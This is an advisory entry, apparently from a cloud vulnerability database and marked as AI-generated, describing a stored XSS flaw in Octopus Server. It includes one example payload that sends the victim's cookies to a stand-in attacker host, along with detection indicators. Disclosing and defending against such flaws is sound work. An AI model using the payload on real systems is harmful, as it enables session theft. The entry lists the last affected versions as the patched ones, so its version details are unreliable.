
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-8296 is a stored Cross-Site Scripting (XSS) vulnerability in Octopus Server that allows authenticated users with certain access levels to embed malicious XSS payloads via artifacts. It affects Octopus Server versions 2023.0.0 through 2025.4.10678, 2026.1.0 through 2026.1.11451, and 2026.2.0 through 2026.2.13114. The vulnerability was published on June 19, 2026, and a patch was made available the same day. It carries a CVSS v4.0 base score of 5.6 (Medium) (GitHub Advisory, Octopus Advisory).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically a stored XSS variant. An attacker with elevated access privileges can upload or associate an artifact within Octopus Server containing a crafted XSS payload; when another user views the artifact, the malicious script executes in their browser context. Exploitation requires high privileges, active user interaction from a victim, and high attack complexity, limiting the attack surface but not eliminating risk in multi-user deployments (GitHub Advisory, Octopus Advisory).
Successful exploitation can result in the theft of sensitive information from the victim's browser session, including session tokens or credentials, due to the high confidentiality impact scored in the CVSS v4.0 metrics. There is no direct integrity or availability impact on the vulnerable system or subsequent systems per the CVSS assessment. In a CI/CD environment like Octopus Deploy, session hijacking could potentially allow an attacker to escalate privileges or pivot to deployment pipelines and connected infrastructure (GitHub Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script> in a field rendered without sanitization.<script>, onerror=, javascript:) in name, description, or metadata fields within the Octopus Server database or UI.Octopus Deploy has released patched versions addressing this vulnerability: 2025.4.10678 (for the 2023.x–2025.x branch), 2026.1.11451 (for the 2026.1.x branch), and 2026.2.13114 (for the 2026.2.x branch). Organizations should upgrade to one of these fixed versions as the primary remediation. As a temporary measure, restricting artifact upload permissions to only highly trusted users can reduce exposure until patching is feasible (Octopus Advisory, GitHub Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."